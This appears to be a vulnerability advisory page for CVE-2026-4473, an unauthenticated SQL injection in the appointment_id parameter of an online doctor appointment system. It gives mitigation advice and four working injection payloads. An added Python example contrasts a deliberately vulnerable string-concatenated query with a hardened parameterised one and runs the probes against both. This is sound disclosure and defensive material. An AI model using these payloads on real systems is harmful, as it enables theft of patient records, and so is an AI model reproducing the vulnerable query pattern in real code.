CVE-2026-4473
SQL Injection in itsourcecode Online Doctor Appointment System
Publication date: 2026-03-20
Last updated on: 2026-04-29
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| unguardable | online_doctor_appointment_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include implementing secure coding practices and restricting database privileges to reduce the risk of exploitation.
- Use prepared statements with parameter binding to separate SQL code from user input, preventing SQL injection.
- Apply strict input validation and filtering to ensure that inputs conform to expected formats.
- Minimize database user permissions by avoiding the use of high-privilege accounts (such as root or admin) for routine database operations.
- Conduct regular security audits of code and systems to detect and address vulnerabilities promptly.
Can you explain this vulnerability to me?
CVE-2026-4473 is a critical SQL injection vulnerability in version 1.0 of the itsourcecode Online Doctor Appointment System, located in the file /admin/appointment_action.php.
The flaw exists because the appointment_id parameter is concatenated directly into an SQL statement without validation, escaping, or parameter binding, so quotes and operators supplied by the client are parsed as SQL (CWE-89).
An attacker who controls appointment_id can therefore alter the query the application builds. The injection techniques reported as working against this parameter are:
- Boolean-based blind SQL injection
- Stacked queries
- Time-based blind SQL injection
- UNION-based SQL injection to extract data
The vulnerability can be exploited remotely without authentication or authorization.
How can this vulnerability impact me?
Exploitation of this vulnerability can lead to unauthorized access to the database, allowing attackers to leak, modify, or delete sensitive data.
Depending on the privileges of the database account the application connects with, it can escalate to compromise of the underlying host and disrupt the service.
Because the vulnerability requires no authentication, it poses a high risk of exploitation by remote attackers.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the `appointment_id` parameter of `/admin/appointment_action.php` for SQL injection. Several techniques can be used to confirm its presence: Boolean-based blind injection (the response changes as the injected condition changes), stacked queries and time-based blind injection (the response is delayed by roughly the requested number of seconds; the `SLEEP()` payloads below are MySQL/MariaDB-specific), and UNION-based injection (the injected marker string appears in the response body).
- Boolean-based blind SQL injection payload example: appointment_id=7' AND 6812=6812 AND 'DAQk'='DAQk&action=fetch_single
- Stacked queries payload example: appointment_id=7';SELECT SLEEP(5) # &action=fetch_single
- Time-based blind SQL injection payload example: appointment_id=7' AND (SELECT 3624 FROM (SELECT(SLEEP(5)))yCgd) AND 'KHeV'='KHeV&action=fetch_single
- UNION-based SQL injection payload example: appointment_id=7' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6b6271,0x6f6b677063794e536154414d424e7445736d5769487a53546c50446b4e43617673644270765562,0x71766b7a71),NULL,NULL,NULL,NULL,NULL-- -&action=fetch_single
Additionally, automated tools like sqlmap can be used to test and confirm the vulnerability by targeting the `appointment_id` parameter. [1]
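The following is an added example, not code from the Online Doctor Appointment System or from the disclosure, that ties the mitigation advice above (prepared statements plus input validation) to the detection method just described. It simulates the `appointment_id` lookup twice: a hypothetical reconstruction of the vulnerable string-concatenation pattern and a hardened handler that validates the format and binds the value as a parameter. It then runs the Boolean-based blind and UNION-based probes from the list above against both. The database is an in-memory SQLite table with constructed sample rows (the real schema is not on the page), so the MySQL-specific `SLEEP()` and stacked-query payloads are not exercised; the names `fetch_single_vulnerable`, `fetch_single_hardened` and the two-column result set are assumptions made for the example.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data standing in for the appointments table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE appointments (id INTEGER PRIMARY KEY, patient TEXT, doctor TEXT)"
    )
    conn.executemany(
        "INSERT INTO appointments VALUES (?, ?, ?)",
        [(7, "Alice", "Dr. Smith"), (8, "Bob", "Dr. Jones")],
    )
    return conn


def fetch_single_vulnerable(conn, appointment_id):
    """Hypothetical reconstruction of the flawed pattern (CWE-89): the
    parameter is spliced into the statement text, so a quote in it closes the
    literal and anything after it is parsed as SQL."""
    sql = "SELECT patient, doctor FROM appointments WHERE id = '%s'" % appointment_id
    return conn.execute(sql).fetchall()


def fetch_single_hardened(conn, appointment_id):
    """Reject anything that is not a short decimal integer, then bind the
    value as a parameter so it never becomes part of the statement text."""
    if not re.fullmatch(r"[0-9]{1,10}", appointment_id):
        raise ValueError("appointment_id must be a decimal integer")
    sql = "SELECT patient, doctor FROM appointments WHERE id = ?"
    return conn.execute(sql, (int(appointment_id),)).fetchall()


def respond(handler, conn, value):
    """Model the HTTP layer: the page body, or a generic error page."""
    try:
        return repr(handler(conn, value))
    except Exception:
        return "ERROR"


def boolean_probe(handler, conn, base="7"):
    """Boolean-based blind check: a TRUE condition must reproduce the baseline
    response and a FALSE condition must change it. Same payload shape as the
    advisory's example, with the comparison flipped for the FALSE case."""
    baseline = respond(handler, conn, base)
    true_resp = respond(handler, conn, base + "' AND 6812=6812 AND 'DAQk'='DAQk")
    false_resp = respond(handler, conn, base + "' AND 6812=6813 AND 'DAQk'='DAQk")
    return true_resp == baseline and false_resp != baseline


def union_probe(handler, conn, base="7", columns=2):
    """UNION-based check: the marker shows up in the body only if the injected
    SELECT ran with the right column count. The advisory's payload does the
    same with ten columns and a hex-encoded marker built by CONCAT()."""
    marker = "qzkbq"
    cols = ["NULL"] * (columns - 1) + ["'%s'" % marker]
    payload = "%s' UNION ALL SELECT %s-- -" % (base, ",".join(cols))
    return marker in respond(handler, conn, payload)


def assess(handler, conn):
    """Run both probes against one handler; True means injectable."""
    return {
        "boolean_blind": boolean_probe(handler, conn),
        "union": union_probe(handler, conn),
    }


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", assess(fetch_single_vulnerable, db))
    print("hardened:  ", assess(fetch_single_hardened, db))
```

Against the vulnerable handler both probes come back positive; against the hardened one the validation step turns every payload into an error response that differs from the baseline for the TRUE and FALSE cases alike, so neither probe fires. Note that a real endpoint returns HTML rather than `repr()` output, so a probe should compare a normalised body (timestamps and CSRF tokens stripped) rather than the raw bytes.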